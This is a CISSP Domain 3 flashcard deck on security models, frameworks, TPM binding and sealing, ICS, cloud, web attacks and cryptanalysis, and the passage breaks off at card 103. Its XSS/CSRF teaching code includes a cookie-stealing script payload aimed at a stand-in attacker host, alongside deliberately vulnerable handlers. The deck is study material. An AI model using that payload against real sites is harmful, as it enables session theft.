Domain 3. Security Architecture and Engineering Flashcards

(131 cards)

1
Q

Principles for Zero Trust (the UK NCSC's eight zero trust architecture principles)

A
  1. Know your architecture, including users, devices, services, and data
  2. Know your user, service, and device identities
  3. Assess user behaviour and the health of your devices and services
  4. Use policies to authorize requests
  5. Authenticate and authorize everywhere
  6. Focus your monitoring on users, devices, and services
  7. Don't trust any network, including your own
  8. Choose services designed for zero trust
2
Q

Seven foundational principles of Privacy by Design

A
  1. Privacy as proactive and preventive, not reactive and remedial
  2. Privacy as the default setting
  3. Privacy embedded into design
  4. Full functionality: positive-sum, not zero-sum (privacy and other legitimate objectives are both met, not traded off)
  5. End-to-End Security
  6. Visibility and Transparency
  7. Respect for User Privacy
3
Q

The Cyber Kill Chain

A
  1. Reconnaissance
  2. Weaponization
  3. Delivery
  4. Exploitation
  5. Installation
  6. Command and Control
  7. Actions on Objectives
4
Q

Representation of something real

A

Model

5
Q

Representation of what security should look like in an architecture being built

A

Security model

6
Q

Comprehensive technical analysis of a solution or a product to ensure it meets the desired needs

A

Certification

7
Q

Official management signoff of certification for a set period of time

A

Accreditation

8
Q

Security Control Frameworks

A

Aid with the control selection process. Provide guidance, based upon best practices. Features from multiple frameworks can be used to meet the needs of an organization

9
Q

Framework created by ISACA for information technology management and IT governance; because it ties IT processes to business objectives and control objectives, it is particularly useful for IT assurance (audit) activities

A

The Control Objectives for Information Technologies (COBIT)

10
Q

Defines the processes of a well-run IT department, specifically the processes for IT service management (ITSM), with a focus on aligning IT services with business goals and objectives.

A

Information Technology Infrastructure Library (ITIL)

11
Q

NIST catalog of security and privacy controls for information systems and organizations; a set of best practices, standards, and recommendations that help an organization select and improve its cybersecurity controls. Mandatory for US federal systems under FISMA, widely used elsewhere as a control baseline.

A

NIST SP 800-53

12
Q

Is a contractual industry standard for organizations that store, process, or transmit payment card data for brands like Visa, MasterCard, and AMEX.

A

Payment Card Industry Data Security Standard (PCI DSS)

13
Q

Specifies the requirements for establishing, implementing, maintaining, and continually improving an information security management system (ISMS) within the context of the organization. Also includes requirements for the assessment and treatment of information security risks tailored to the needs of the organization.

Organizations can be certified against ISO 27001.

Annex A of the 2013 edition grouped its controls into the following 14 domains:
1. Information security policies
2. Organization of information security
3. Human resources security
4. Asset management
5. Access control
6. Cryptography
7. Physical and environmental security
8. Operations security
9. Communications security
10. System acquisition, development, and maintenance
11. Supplier relationships
12. Information security incident management
13. Information security aspects of business continuity management
14. Compliance

The 2022 edition reorganizes Annex A into 93 controls under four themes: organizational, people, physical, and technological.

A

International Organization for Standardization/International Electrotechnical Commission (ISO/IEC) ISO 27001:2022

14
Q

ISO/IEC 27002:2022 provides guidelines for organizational information security standards and information security management practices, including the selection, implementation, and management of controls, taking into consideration the organization's information security risk environment(s). Essentially, ISO 27002 provides implementation guidance for the controls listed in ISO 27001 Annex A; organizations are certified against 27001, not 27002.

A

ISO 27002

15
Q

is a voluntary private sector initiative dedicated to improving organizational performance and governance through effective internal control, enterprise risk management, and fraud deterrence.

A

Committee of Sponsoring Organizations of the Treadway Commission (COSO)

16
Q

Focuses on the protection of protected health information (PHI) of individuals.

A

Health Insurance Portability and Accountability Act (HIPAA)

17
Q

Requires US federal agencies to develop, document, and implement agency-wide security programs to provide information security for the operations and assets of the agency. The requirement extends to information systems operated on the agency's behalf by other agencies, contractors, or service providers.

A

Federal Information Security Management Act (FISMA) of 2002 (amended by the Federal Information Security Modernization Act of 2014)

18
Q

provides a standardized approach to security assessment, authorization, and continuous monitoring for cloud products and services. Any cloud services that hold US federal government data must be FedRAMP authorized.

A

Federal Risk and Authorization Management Program (FedRAMP)

19
Q

Is a direct result of the wild financial fraud at “Enron”. The US Congress decided better controls were needed to be in place to prevent similar incidents from happening again, and specifically enacted SOX to prevent financial fraud by public companies and thereby protect the financial interests of shareholders.

A

Sarbanes-Oxley (SOX) Act

20
Q

Uses mandatory access control (MAC) to enforce the DoD multilevel security policy. Confidentiality. Lattice-based.

  1. Simple Security Property (no read up)
  2. Star (*) Security Property (no write down)
  3. Strong star property (subject can read and write only at their own security level - not above or below)
A

Bell-LaPadula

21
Q

Integrity. Lattice-based.

  1. Simple integrity property (no read down: a subject cannot read an object at a lower integrity level).
  2. Star (*) integrity property (no write up: a subject cannot write to an object at a higher integrity level).
  3. Invocation property (a subject cannot invoke, i.e. request service from, a subject at a higher integrity level).
A

Biba
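The two lattice models above are easiest to compare when both rule sets are written as the same dominance check pointed in opposite directions. The following is an added example, not part of the original flashcards: a minimal mandatory access control decision function for Bell-LaPadula (confidentiality) and Biba (integrity). The level names, the compartments, and the sample labels are assumptions chosen for illustration.

```python
# Added example, not from the original flashcards: lattice-based MAC checks for
# Bell-LaPadula (confidentiality) and Biba (integrity). Level names,
# compartments and the sample subjects/objects below are assumptions.

CONF_LEVELS = {"UNCLASSIFIED": 0, "CONFIDENTIAL": 1, "SECRET": 2, "TOP_SECRET": 3}
INTEGRITY_LEVELS = {"LOW": 0, "MEDIUM": 1, "HIGH": 2}


def label(levels, name, *compartments):
    """Build a lattice label: (numeric level, frozenset of compartments)."""
    return (levels[name], frozenset(compartments))


def dominates(a, b):
    """Lattice ordering: a dominates b when a's level is at least b's level and
    a holds every compartment b holds. Labels with different compartments can
    be incomparable: neither dominates the other, so neither direction flows."""
    return a[0] >= b[0] and a[1] >= b[1]


def blp_allows(subject, obj, op):
    """Bell-LaPadula: simple security (no read up), * property (no write down)."""
    if op == "read":
        return dominates(subject, obj)   # clearance must dominate classification
    if op == "write":
        return dominates(obj, subject)   # classification must dominate clearance
    raise ValueError(f"unknown operation {op!r}")


def biba_allows(subject, obj, op):
    """Biba: simple integrity (no read down), * integrity (no write up).
    Same dominance test as BLP, with the directions mirrored."""
    if op == "read":
        return dominates(obj, subject)   # object integrity must dominate subject
    if op == "write":
        return dominates(subject, obj)   # subject integrity must dominate object
    raise ValueError(f"unknown operation {op!r}")


def blp_demo():
    """Decisions for a subject cleared SECRET with no compartments (constructed)."""
    subject = label(CONF_LEVELS, "SECRET")
    conf = label(CONF_LEVELS, "CONFIDENTIAL")
    top = label(CONF_LEVELS, "TOP_SECRET")
    crypto = label(CONF_LEVELS, "SECRET", "CRYPTO")
    return {
        "read CONFIDENTIAL": blp_allows(subject, conf, "read"),     # read down: ok
        "write CONFIDENTIAL": blp_allows(subject, conf, "write"),   # write down: denied
        "read TOP_SECRET": blp_allows(subject, top, "read"),        # read up: denied
        "write TOP_SECRET": blp_allows(subject, top, "write"),      # write up: ok
        # Compartment the subject lacks: reading is denied, but writing into it
        # is allowed because information only flows toward the stricter label.
        "read SECRET/CRYPTO": blp_allows(subject, crypto, "read"),
        "write SECRET/CRYPTO": blp_allows(subject, crypto, "write"),
    }


def biba_demo():
    """Decisions for a MEDIUM-integrity subject (constructed)."""
    subject = label(INTEGRITY_LEVELS, "MEDIUM")
    low = label(INTEGRITY_LEVELS, "LOW")
    high = label(INTEGRITY_LEVELS, "HIGH")
    return {
        "read LOW": biba_allows(subject, low, "read"),     # no read down
        "write LOW": biba_allows(subject, low, "write"),   # writing down is fine
        "read HIGH": biba_allows(subject, high, "read"),   # reading up is fine
        "write HIGH": biba_allows(subject, high, "write"), # no write up
    }


if __name__ == "__main__":
    for name, allowed in {**blp_demo(), **biba_demo()}.items():
        print(f"{name:22s} {'ALLOW' if allowed else 'DENY'}")
```

The compartment case is the one worth remembering: under Bell-LaPadula a SECRET subject without the CRYPTO compartment may write into a SECRET/CRYPTO object but not read it, which is exactly the "write up is allowed" behaviour that makes BLP a confidentiality model and not an integrity model.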

22
Q

Integrity model built around well-formed transactions and separation of duties rather than security labels: users never touch protected data directly, only through certified programs.

  1. constrained data item (CDI) - any data item whose integrity is protected by the model
  2. unconstrained data item (UDI) - any data item not controlled by the model (e.g., raw user input)
  3. integrity verification procedure (IVP) - a procedure that scans data items and confirms their integrity
  4. transformation procedure (TP) - the only kind of procedure allowed to modify a CDI (or to turn a UDI into a CDI)

Access control triple (triplet)

Authenticated principal (user) "subject" > program (transformation procedure) > data item (UDI or CDI) "object"

The relationship between an authenticated principal (i.e., user) and the set of programs (i.e., TPs) that the principal is permitted to run on a set of data items (e.g., UDIs and CDIs)

A

Clark Wilson

23
Q

Directed-graph model of how access rights propagate between subjects and objects (usually listed under confidentiality models in CISSP material).

Supports four basic operations: take, grant, create, and revoke (remove)

A

Take Grant Model

24
Q

Confidentiality.

Also called the “Chinese Wall model”. It was developed to prevent conflict of interest (COI) problems.

A

Brewer and Nash Model

25
Uses a formal set of protection rules in which each object has an owner and each subject has a controller. It focuses on the secure creation and deletion of subjects and objects and on how access rights are assigned. Eight primary protection rules (create subject, create object, delete subject, delete object, read access right, grant access right, delete access right, transfer access right) define the boundaries of the permitted actions.
Graham-Denning Model
26
Describes a system that is always secure no matter what state it is in. Based on the computer science definition of finite state machine (FSM). A state is a snapshot of a system at a specific moment in time. All state transitions must be evaluated. If each possible state transition results in another secure state, the system can be called a secure state machine.
State Machine Model
27
Focuses on the flow of information between security levels and is based on the state machine model. Biba and Bell-LaPadula are both information flow models.
Information Flow Model
28
Is loosely based on the information flow model. Concerned with how actions of a subject at a higher security level affect the system state or the actions of a subject at a lower security level. Ensures that the actions of different objects and subjects aren't seen by (and don't interfere with) other objects and subjects on the same system.
Non-Interference Model
29
Assigns every subject (such as an individual, group, or organization) and every object (such as a resource, computer, or application) a label from a partially ordered set, the lattice, in which any two labels have a least upper bound and a greatest lower bound. Access between any combination of subjects and objects is decided by comparing labels: information may flow only from a label to one that dominates it. Bell-LaPadula and Biba are lattice-based.
Lattice-Based Model
30
Also known as the orange book, is the first evaluation criteria system. A structured set of criteria for evaluating computer security within products and systems.
Trusted Computer System Evaluation Criteria (TCSEC)
31
Represents an initial attempt to create security evaluation criteria in Europe. Uses two scales to rate functionality and assurance.
Information Technology Security Evaluation Criteria (ITSEC)
32
Enable an objective evaluation to validate that a particular product or system satisfies a defined set of security requirements.
Common Criteria (CC), ISO/IEC 15408
33
Specification of functional and assurance requirements for a specific type of security product.
Protection Profile (PP)
34
The specific product/system to be evaluated.
Target of Evaluation (ToE)
35
Written statement by vendor explaining how functional and assurance specifications of the product meet the protection profile (PP) requirements.
Security Targets (ST)
36
Security targets are evaluated from a functional perspective: what features exist and how well they work relative to the desired and expected security behavior.
Security functional requirements
37
Consider all of the components together
Evaluate
38
Common Criteria Steps:
Step 1. Protection Profile (PP)
Step 2. Target of Evaluation (TOE)
Step 3. Security Target (ST)
Step 4. Security Functional Requirements
Step 5. Security Assurance Requirements
Step 6. Evaluate
Step 7. Assign Evaluation Assurance Level (EAL 1-7)
39
Is simply the concept of a subject accessing an object through some form of mediation that is based on a set of rules, with this access being logged and monitored.
The Reference Monitor Concept (RMC)
40
The totality of protection mechanisms (hardware, firmware, and software) within an architecture that together enforce the security policy; everything outside the TCB is untrusted.
Trusted Computing Base (TCB)
41
Is the implementation of the reference monitor concept. Must have three properties: completeness (it mediates every access and cannot be bypassed), isolation (it is tamperproof), and verifiability (it is small and simple enough to be tested and verified).
Security Kernel
42
Is a form of conceptual layering that segregates and protects operational domains from each other.
The ring protection model
43
Is a piece of hardware that implements an ISO/IEC standard (ISO/IEC 11889), resulting in the ability to establish trust in a platform's security and privacy state. Is an independent component of a computing system and functions similarly to a black box: keys generated inside it never leave it in the clear. Binding and sealing are important operations that help a __ protect keys and data.
Trusted Platform Module (TPM)
44
A cryptographic operation in which data is encrypted with a key that is protected by a specific TPM, so that only that TPM can decrypt it. Binding ties the data to the chip, not to the platform's current state: a key bound to a TPM cannot be used on another machine, but it can be used on that machine regardless of what software was booted.
Binding
45
A cryptographic operation that, like binding, encrypts data so that only the TPM can decrypt it, but additionally ties the data to a specific platform state recorded in the TPM's Platform Configuration Registers (PCRs). The TPM will only unseal the data if the current PCR values match those recorded at sealing time (i.e., the measured firmware, bootloader, and OS have not changed), optionally combined with an authorization value supplied by the user. Sealing is how a disk-encryption key can be released only when the system has booted into a known-good configuration.
Sealing
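The difference between the two operations is clearest when both are run against the same blob after a tampered boot. The following is an added example, not part of the original flashcards and not real TPM code: a software simulation using only the Python standard library. The "TPM" is an object holding a secret seed that never leaves it (standing in for the storage root key) and one PCR; the PCR extension and the seal/unseal policy check follow the real mechanism (PCR := H(PCR || measurement digest)), but the cipher is a toy HMAC keystream, and the component names and disk key are constructed.

```python
# Added example, not from the original flashcards and not a real TPM: a
# stand-in that simulates PCR extension, binding and sealing with hashlib/hmac.
# The cipher is a toy HMAC-counter keystream; the TPM's own algorithms differ.
import hashlib
import hmac
import os


class SimulatedTPM:
    """A secret seed that never leaves the object (role of the storage root
    key) plus one Platform Configuration Register."""

    def __init__(self, seed: bytes):
        self._seed = seed
        self.pcr = bytes(32)  # PCR is all zeros at power-on

    def extend(self, measurement: bytes) -> bytes:
        """PCR := SHA-256(PCR || SHA-256(measurement)). One-way and order-sensitive,
        so a given PCR value can only be reached by the same measured chain."""
        self.pcr = hashlib.sha256(self.pcr + hashlib.sha256(measurement).digest()).digest()
        return self.pcr

    def _xor(self, data: bytes, key: bytes) -> bytes:
        # Toy keystream: HMAC(key, counter) blocks XORed over the data.
        stream = b"".join(hmac.new(key, i.to_bytes(4, "big"), hashlib.sha256).digest()
                          for i in range((len(data) + 31) // 32))
        return bytes(a ^ b for a, b in zip(data, stream))

    def bind(self, data: bytes) -> bytes:
        """Binding: key depends only on this TPM's seed, not on its state."""
        return self._xor(data, hmac.new(self._seed, b"bind", hashlib.sha256).digest())

    def unbind(self, blob: bytes) -> bytes:
        return self.bind(blob)  # XOR with the same keystream inverts it

    def seal(self, data: bytes) -> tuple:
        """Sealing: key depends on the seed AND the current PCR; the expected
        PCR travels with the blob so unseal can enforce the policy."""
        key = hmac.new(self._seed, b"seal" + self.pcr, hashlib.sha256).digest()
        return (self.pcr, self._xor(data, key))

    def unseal(self, blob: tuple) -> bytes:
        expected_pcr, ct = blob
        if not hmac.compare_digest(expected_pcr, self.pcr):
            raise PermissionError("PCR policy mismatch: platform state changed")
        key = hmac.new(self._seed, b"seal" + self.pcr, hashlib.sha256).digest()
        return self._xor(ct, key)


def demo() -> dict:
    """Seal and bind a disk key on a known-good boot, then retry after a tampered
    boot of the same chip and on a different chip. All values are constructed."""
    good_chain = [b"firmware v1", b"bootloader v2", b"kernel 6.1"]
    bad_chain = [b"firmware v1", b"bootloader EVIL", b"kernel 6.1"]
    disk_key = b"example-disk-encryption-key"
    seed = os.urandom(32)

    tpm = SimulatedTPM(seed)
    for component in good_chain:
        tpm.extend(component)
    sealed, bound = tpm.seal(disk_key), tpm.bind(disk_key)
    results = {"unseal_good_boot": tpm.unseal(sealed) == disk_key,
               "unbind_good_boot": tpm.unbind(bound) == disk_key}

    tampered = SimulatedTPM(seed)  # same chip, rebooted with a modified bootloader
    for component in bad_chain:
        tampered.extend(component)
    try:
        results["unseal_tampered_boot"] = tampered.unseal(sealed) == disk_key
    except PermissionError:
        results["unseal_tampered_boot"] = False
    results["unbind_tampered_boot"] = tampered.unbind(bound) == disk_key  # state ignored

    other = SimulatedTPM(os.urandom(32))  # different chip, same good boot chain
    for component in good_chain:
        other.extend(component)
    results["unbind_other_tpm"] = other.unbind(bound) == disk_key
    results["unseal_other_tpm"] = other.unseal(sealed) == disk_key  # PCR matches, seed does not
    return results
```

The two failure cases are the point: a bound blob still opens after the tampered boot because binding only cares which chip is asking, while the sealed blob is refused; on a different chip the PCR policy passes (same measured chain) but the wrong seed yields garbage, so sealing protects against both a moved disk and a modified boot chain.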
46
Is a general term used to describe control systems related to industrial processes and critical infrastructure.
Industrial control system (ICS)
47
Used to monitor and control geographically dispersed assets. Typically communicates over long distances. For ex; power grids, water treatment, oil and gas pipelines.
SCADA (Supervisory Control and Data Acquisition)
48
Used for controlling processes in a localized area. Control elements are distributed but centrally managed. For ex; refineries, chemical plants, manufacturing.
DCS (Distributed Control System)
49
Rugged computers used for automation of electromechanical processes. Can be part of DCS or SCADA. For ex; Assembly lines, elevators, packaging systems.
PLC (Programmable Logic Controller)
50
Field devices that interface with sensors/actuators and communicate with SCADA systems. For ex; remote oil well monitoring, pipeline valves.
RTU (Remote Terminal Unit)
51
Interface between operators and control systems, allowing visualization and control. For ex; control room dashboards, touchscreen panels on machines.
HMI (Human-Machine Interface)
52
When particular resources are needed, they can be provisioned immediately and automatically by the customer, without human interaction with the provider.
On-demand self-service
53
The cloud can be accessed from anywhere over standard networks, using various types of devices, like smartphones, tablets, and laptops.
Broad network access
54
Relates to sharing the three primary resources of cloud computing (compute, storage, and network) among multiple customers. They are almost never directly accessible, because they are typically shared, or pooled, among multiple users.
Resource pooling
55
Relates to how quickly compute, storage, and network can be increased or decreased in the cloud. Resources can be rapidly provisioned and deprovisioned—usually automatically or with just a few clicks.
Rapid elasticity and scalability
56
The cloud provider tracks resource usage very closely, to the point that a cloud customer only pays for the resources used, measured in very small increments-minutes, or even seconds.
Measured service
57
Multiple customers (tenants) share the same physical infrastructure and often the same software instance, separated only by logical isolation. In a public cloud anybody can become a tenant, so malicious third parties may be running on the same host as you; tenant isolation is therefore one of the provider's core controls.
Multitenancy
58
Environment where customers can deploy virtualized infrastructure, including compute, storage, and networking components.
IaaS
59
Platform which provides the services and functionality for customers to develop and deploy applications.
PaaS
60
Software offered by a cloud service provider which is available on demand, typically via the internet, for a customer.
SaaS
61
Also known as a virtual machine manager/monitor (VMM), is software that allows multiple operating systems to share the resources of a single physical machine.
Hypervisor
62
resembles a computer, but everything is emulated using software.
Virtual machine (VM)
63
Runs directly on the hardware, so the attack surface is smaller than a type 2 hypervisor's. This makes it more secure if implemented correctly. Commonly used for QA, load testing, and production scenarios. Typically more expensive. VMware ESXi, KVM, Microsoft Hyper-V
Type 1 "Bare metal"
64
Runs on top of a host operating system, so the attack surface is larger (the host OS and its applications are also exposed). This makes it less secure than type 1, even if implemented properly. Commonly used for individual development and lab scenarios. Typically less expensive. VMware Workstation, Oracle VirtualBox.
Type 2 "Hosted"
65
A lightweight, granular, and portable way to package applications for multiple platforms. Reduces overhead of server virtualization by enabling containerized apps to run on a shared OS kernel. Share many concerns of server virtualization: isolation at host, process, network, and storage levels. Can be used in some cases to isolate existing applications developed to run in a VM with a dedicated operating system.
Containerization
66
Collecting, gathering, or combining data for the purpose of statistical analysis.
Aggregation
67
Deducing information from evidence and reasoning rather than from explicit statements.
Inference
68
Is a deprecated XML-based, Organization for the Advancement of Structured Information Standards (OASIS) standard that was developed to allow cooperating users, resource owners, and service providers—the federation—to exchange information seamlessly for purposes of provisioning.
SPML (Services Provisioning Markup Language)
69
Is an XML-based, OASIS standard that utilizes security tokens that contain assertions about a user. Facilitates service requests made by users to service providers in the form of requests to identity providers, which—if the user is authenticated/authorized—result in __ assertions allowing the user access to the service.
SAML (Security Assertion Markup Language)
70
Is an open-standard authorization framework (RFC 6749) used in Federated Identity Management (FIM). It handles authorization only and is typically paired with OpenID Connect for authentication. Provides applications with "secure delegated access" via access tokens instead of sharing the user's credentials. OAuth enables disparate resources to securely interact in a manner that ultimately allows a client to access data owned by a resource owner.
OAuth (Authorization)
71
Is a suite of technologies that is often looked upon as the future of wide area networks (WANs). It combines network security and wide area networking into a cloud-based service. It aims to get data and services as close to the end users as possible, while still maintaining robust security. It is an outgrowth of many other trends, such as cloud services, edge computing, and the increase in remote work, which requires new security approaches.
Secure Access Service Edge (SASE)
72
Involves a malicious script that is injected into a trusted website that a visitor’s browser then downloads and executes. The target of attack is the user's browser.
Cross-site scripting (XSS) attack
73
Exploits the fact that the browser automatically attaches session cookies to every request to a site, so an attacker's page can make the victim's browser send a state-changing request that the server accepts as legitimate. The target of the attack is the web server (the action it performs).
Cross-site request forgery (CSRF)
74
Types of XSS (persistent or stored, reflected, DOM-based)
Persistent or Stored: injected code is stored on the server and embedded in the HTML page sent to all subsequent visitors (victims). PERSISTENT.
Reflected: injected code is passed to a vulnerable server via the URL (or another request parameter) and reflected back to the victim. MOST COMMON form of XSS.
DOM-based: the client-side document object model (DOM) environment is modified by client-side script and malicious code is injected, without the server ever seeing the payload. Can be either persistent or reflected.
DOM-based XSS is intentionally not covered in detail, as this type of XSS attack is far more rare and unlikely to be covered on the exam.
75
Unwanted action performed on the user's browser. User's browser (client) runs malicious JavaScript code. User's browser is exploited.
XSS
76
Unwanted action performed on a trusted website. Website (server) executes a command from trusted user's browser. Web server is exploited.
CSRF
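Both attacks are easier to tell apart in code than in prose: in XSS the server reflects attacker data into the page and the browser runs it; in CSRF the server trusts a request only because the browser attached the victim's cookie. The following is an added example, not from the original flashcards: a vulnerable and a fixed version of each, written as plain functions so it runs without a web framework. The request/response shapes, the session store, the HMAC token scheme and the `attacker.example` payload are assumptions standing in for whatever framework you actually use.

```python
# Added example, not from the original flashcards: reflected XSS and CSRF,
# each shown vulnerable and fixed. Request dicts, SESSIONS and the token
# scheme are assumptions; the payload and account data are constructed.
import hashlib
import hmac
import html
import secrets

SERVER_SECRET = secrets.token_bytes(32)   # per-deployment secret (assumption)
SESSIONS = {"sess-victim-123"}            # constructed: one logged-in user


# --- XSS: the browser is the target -----------------------------------------

def search_page_vulnerable(query: str) -> str:
    """Reflects the query unescaped: a <script> in the URL runs in the browser
    of every victim who follows the link."""
    return f"<p>Results for: {query}</p>"


def search_page_fixed(query: str) -> str:
    """Contextual output encoding: escape untrusted data for an HTML text
    context before it is written into the page."""
    return f"<p>Results for: {html.escape(query, quote=True)}</p>"


# --- CSRF: the server is the target -----------------------------------------

def issue_csrf_token(session_id: str) -> str:
    """Token bound to the session with an HMAC: a cross-origin page cannot read
    the victim's session or the server secret, so it cannot forge one."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def transfer_vulnerable(request: dict) -> str:
    """Acts on the session cookie alone. A form auto-submitted from the
    attacker's site carries the victim's cookie, so it looks legitimate."""
    if request["cookie_session"] not in SESSIONS:
        return "401 not logged in"
    form = request["form"]
    return f"transferred {form['amount']} to {form['to']}"


def transfer_fixed(request: dict) -> str:
    """Requires a token that only a same-origin page could have embedded."""
    sid = request["cookie_session"]
    if sid not in SESSIONS:
        return "401 not logged in"
    supplied = request["form"].get("csrf_token", "")
    if not hmac.compare_digest(issue_csrf_token(sid).encode(), supplied.encode()):
        return "403 CSRF token missing or invalid"
    form = request["form"]
    return f"transferred {form['amount']} to {form['to']}"


def demo() -> dict:
    payload = '<script>fetch("https://attacker.example/?c="+document.cookie)</script>'
    forged = {"cookie_session": "sess-victim-123",              # browser attaches it
              "form": {"to": "attacker", "amount": "1000"}}      # no token: cross-origin
    legit = {"cookie_session": "sess-victim-123",
             "form": {"to": "rent", "amount": "900",
                      "csrf_token": issue_csrf_token("sess-victim-123")}}
    return {
        "xss_vulnerable_has_script": "<script>" in search_page_vulnerable(payload),
        "xss_fixed_has_script": "<script>" in search_page_fixed(payload),
        "csrf_vulnerable": transfer_vulnerable(forged),
        "csrf_fixed_forged": transfer_fixed(forged),
        "csrf_fixed_legit": transfer_fixed(legit),
    }
```

In a real application the token check is complemented by `SameSite` session cookies and by escaping for the specific context (attribute, JavaScript, URL) the data lands in, since `html.escape` is only correct for HTML text and quoted attribute values.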
77
Also known as cleartext, data is readable by anyone.
Plaintext
78
Converting plaintext into ciphertext using cryptographic algorithm and a key/crypto variable.
Encrypt/Encryption
79
A KEY used to encrypt and decrypt the message.
Key/Crypto Variable
80
Turning ciphertext back into plaintext using a cryptographic algorithm and a key.
Decrypt/Decryption
81
Describes what happens when two different keys produce the same ciphertext from the same plaintext. This is bad, because either key can then decrypt that ciphertext, so an attacker brute-forcing the key has two targets instead of one, which effectively reduces the key space that must be searched.
Key Clustering
82
An estimated amount of time or effort required by an attacker to break a cryptosystem. The higher the work factor, the more secure the cryptosystem.
Work Factor
83
Is a random or unique value that is used together with the key and fed into a cryptographic algorithm when encrypting plaintext. An IV or nonce must never be reused with the same key (a nonce must be unique per key; an IV for CBC mode must also be unpredictable), so that encrypting the same plaintext twice does not produce the same ciphertext and patterns are not revealed.
Initialization Vector (IV)/Nonce
84
Focuses on hiding the relationship between the key and the resulting ciphertext, so that each ciphertext bit depends on the key in a complex, non-linear way. In practice this is checked by changing one bit of the key: about half of the bits in the ciphertext should change.
Confusion
85
Focuses on hiding the relationship between the plaintext and the ciphertext by spreading the influence of each plaintext bit across many ciphertext bits. If a single bit of the plaintext is changed, approximately half of the bits in the ciphertext should change.
Diffusion
86
To determine the security and effectiveness of an algorithm, the __ effect should be studied. It looks at the degree of confusion and diffusion that an algorithm provides. The ideal case is that a single bit change to either the key (confusion) or the plaintext (diffusion) changes about 50 percent of the ciphertext bits, i.e. each output bit flips with probability one half; a change that is consistently much smaller (or much larger) reveals structure an attacker can use.
Avalanche
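The avalanche property is measurable, which makes it a useful sanity check on any "home-grown" transform. The following is an added example, not from the original flashcards: it flips one input bit at a time against SHA-256 (diffusion: one plaintext bit) and HMAC-SHA256 (confusion: one key bit, message fixed) and averages the number of changed output bits, alongside a control transform with no avalanche at all. The inputs are derived from a constructed seed so the run is reproducible.

```python
# Added example, not from the original flashcards: empirical avalanche
# measurement with standard-library primitives. Inputs derive from a
# constructed seed; the "no avalanche" control is a fixed-key XOR.
import hashlib
import hmac


def hamming(a: bytes, b: bytes) -> int:
    """Number of differing bits between two equal-length byte strings."""
    return sum(bin(x ^ y).count("1") for x, y in zip(a, b))


def flip_bit(data: bytes, index: int) -> bytes:
    """Copy of data with one bit inverted (index 0 = LSB of byte 0)."""
    buf = bytearray(data)
    buf[index // 8] ^= 1 << (index % 8)
    return bytes(buf)


def avalanche_stats(trials: int = 200, seed: bytes = b"constructed-seed") -> dict:
    """Average changed output bits (out of 256) for a one-bit change in the
    message (diffusion) and in the key (confusion)."""
    state = hashlib.sha256(seed).digest()
    diffusion = confusion = 0
    for i in range(trials):
        state = hashlib.sha256(state + i.to_bytes(4, "big")).digest()
        msg = state                                    # 32-byte message
        key = hashlib.sha256(b"key" + state).digest()  # 32-byte key
        bit = i % 256                                  # walk every bit position
        # Diffusion: same function, one plaintext bit changed.
        diffusion += hamming(hashlib.sha256(msg).digest(),
                             hashlib.sha256(flip_bit(msg, bit)).digest())
        # Confusion: same message, one key bit changed.
        confusion += hamming(hmac.new(key, msg, hashlib.sha256).digest(),
                             hmac.new(flip_bit(key, bit), msg, hashlib.sha256).digest())
    return {"diffusion_avg_bits": diffusion / trials,
            "confusion_avg_bits": confusion / trials,
            "output_bits": 256}


def xor_control_stats(trials: int = 200, seed: bytes = b"constructed-seed") -> float:
    """Control with no avalanche: XOR with a fixed key maps a one-bit input
    change to exactly one output bit, which is why the relationship between
    plaintext and ciphertext is immediately visible."""
    fixed_key = hashlib.sha256(b"fixed" + seed).digest()
    state = hashlib.sha256(seed).digest()
    changed = 0
    for i in range(trials):
        state = hashlib.sha256(state + i.to_bytes(4, "big")).digest()
        ct1 = bytes(m ^ k for m, k in zip(state, fixed_key))
        ct2 = bytes(m ^ k for m, k in zip(flip_bit(state, i % 256), fixed_key))
        changed += hamming(ct1, ct2)
    return changed / trials


if __name__ == "__main__":
    print(avalanche_stats())       # both averages land near 128 of 256 bits
    print(xor_control_stats())     # exactly 1.0
```

For a well-designed primitive both averages sit near 128 of 256 bits (about 50%); the XOR control sits at exactly 1, which is the "no diffusion" end of the scale that the substitution and transposition ciphers on the following cards also occupy.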
87
Characters are replaced with a different character. For ex; GUBBINS > JXEELQV
Substitution
88
The order of characters is rearranged. For ex; GUBBINS > BINBUGS
Transposition
89
The primary goal of a __ attack is to determine the key
Cryptanalytic attacks
90
Involves trying every possible key until the correct key is identified; typically not effective unless the key length is very short (56 bits or less).
Brute-force attack
91
The most difficult cryptanalytic attack, because the attacker ONLY has access to the ciphertext. In other words, the attacker has no real way to determine the actual plaintext except through enormous and timely effort.
Ciphertext-only attack
92
The attacker has access to both the ciphertext and the corresponding plaintext, and both sources of information can be used to determine the key. More importantly, once the key is determined, two things can happen. One, other pieces of ciphertext can be easily decrypted, and two, the key can be used to forge messages.
Known-plaintext attack
93
EVERYTHING except the KEY is known. The attacker can feed plaintext into the device and examine the resulting ciphertext to determine the key;
Chosen-plaintext attack
94
EVERYTHING except the KEY is known. The opposite happens, and ciphertext is fed into the machine with the resulting plaintext being scrutinized.
Chosen-ciphertext attack
95
Both types of attacks use complicated math to deduce the key. In each case, multiple iterations of the attack are conducted to determine probability values of a given key being the key used for encryption.
Differential cryptanalysis employs a form of chosen-plaintext attack. Linear cryptanalysis uses a known-plaintext attack approach.
96
In this attack, the attacker is trying to factor a very large number to determine the private key. This type of attack is specifically focused on the RSA algorithm, which uses factoring as the underlying hard math problem.
Factoring cryptanalysis
97
Attacker pretends to be both parties in relation to the communication.
Man-in-the-Middle Attack
98
Is like a man-in-the-middle attack, as the attacker is again able to monitor traffic flowing between two or more parties. However, this time the attacker aims at capturing useful information (like session identification details or authentication information) and then “replaying” it later to gain access to a target system.
Replay Attack
99
The goal of the attacker during this attack is to gain access to valid password hashes that can then be used to bypass standard authentication steps and authenticate to a system as a legitimate user.
Pass-the-Hash Attack
100
During the encryption or decryption process, the key might be obtained from a secure storage area and temporarily stored in RAM or another volatile memory location to facilitate quick decryption/encryption calculations. At this point, if an attacker can gain access to the system, they might be able to read the memory space and gain access to the key, which could then be used for much broader purposes.
Temporary Files Attack
101
Focus on an inherent weakness in how an algorithm is implemented rather than a weakness with the algorithm itself.
Implementation Attack
102
Are very sophisticated attacks and are therefore only used by equally sophisticated organizations, like intelligence agencies, advanced persistent threat groups, and security researchers. The target is not the system or the algorithm itself. Rather, using complex tools, a system’s operations can be monitored and measured. Based upon these observations and measurements of items like timing (the length of time to perform an activity), power used (how much power is consumed during an activity), and radiation emissions (emissions made by all devices and systems), significant insight can be gleaned.
Side-Channel Attack
103
Types of side-channel attacks:
